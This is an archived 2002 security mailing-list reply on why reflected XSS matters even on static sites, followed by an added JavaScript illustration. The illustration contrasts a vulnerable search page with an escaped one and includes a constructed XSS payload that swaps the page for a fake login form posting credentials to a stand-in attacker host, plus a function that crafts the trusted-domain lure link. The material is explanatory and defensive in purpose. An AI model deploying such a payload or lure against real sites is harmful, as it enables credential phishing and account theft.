
RE: XSS

From: David Endler <dendler(at)idefense.com>
Date: Tue Dec 10 2002 - 13:40:08 EST


Hi John,

I guess what you're asking is if your company has a vulnerable static web site, should you really care? With regard to that web site's data, you're probably safe, unless you're sharing cookies/tokens across multiple domains (e.g. MS Passport). I know I'm belaboring the point which has been made in other mailing list posts, but you can do a lot more with XSS besides cookie stealing/account hijacking.

XSS attacks can be used to assist in various types of browser exploitation (buffer/heap overflow, browser hijacking, etc.) which can lead to revealing sensitive information/files on the desktop or network file system, denial of service scripting against the user or others, or potentially any code the attacker can get the browser to launch with the privileges of that user.

How does this affect your web site data directly? It may not. But vulnerable users (and your clients) are much more likely to click on malicious web or email links with domains they know and trust (e.g. yahoo.com, cnn.com, yourcompany.com, etc.).

-dave  

> -----Original Message-----
Received on Tue Dec 10 14:07:41 2002
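The point above, that a reflected XSS on a site with no valuable cookies still hands an attacker a link under a trusted domain, is illustrated by the following added example. It is not part of the original e-mail or of any project discussed on the list; the host name, the search handler and the payload are all constructed for illustration. The payload never reads document.cookie: it overwrites the page with a fake login form, which works against a purely static site as long as one dynamic page echoes its input unescaped.

```javascript
// Added example (not from the original e-mail). A "static" site often keeps
// one dynamic page, such as site search or a "page not found" handler that
// echoes the requested path. That page is enough for reflected XSS.
// All names, the host and the payload below are constructed for illustration.

const TRUSTED_HOST = "https://www.yourcompany.example"; // assumed domain

// Minimal HTML escaping for text nodes and double-quoted attribute values.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: the query string is pasted into the page as markup.
function renderSearchVulnerable(q) {
  return `<h1>Results for: ${q}</h1><p>No pages matched.</p>`;
}

// Hardened: the same page with the untrusted value escaped before insertion.
function renderSearchSafe(q) {
  return `<h1>Results for: ${escapeHtml(q)}</h1><p>No pages matched.</p>`;
}

// Constructed payload. It does not touch document.cookie at all: it replaces
// the page body with a fake login form posting to an attacker-controlled host,
// so it works even when the vulnerable site sets no cookies of value.
const PAYLOAD =
  "<script>document.body.innerHTML=" +
  "'<form action=\"https://attacker.example/collect\">" +
  "Session expired, sign in again: <input name=\"u\">" +
  "<input name=\"p\" type=\"password\"></form>'</script>";

// The link a victim would receive: it points at the trusted domain and the
// payload rides along in the query string, URL-encoded.
function craftLink(payload) {
  return `${TRUSTED_HOST}/search?q=${encodeURIComponent(payload)}`;
}

// What the server sees after parsing the query string of that link.
function queryFromLink(link) {
  return new URL(link).searchParams.get("q");
}

// Rough check used only to contrast the two renderers: is there an
// executable script element in the output?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Walk the full chain: craft link -> server decodes q -> render both ways.
function demo() {
  const link = craftLink(PAYLOAD);
  const q = queryFromLink(link);
  return {
    link,
    vulnerable: containsScriptTag(renderSearchVulnerable(q)), // true
    safe: containsScriptTag(renderSearchSafe(q)),             // false
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The link in the output starts with the trusted host, which is exactly why the recipient is more likely to click it; the only server-side difference between the two renderers is the escaping call, and context-appropriate output encoding (here, for an HTML text node) is the fix, not cookie hardening.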

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:46 EDT

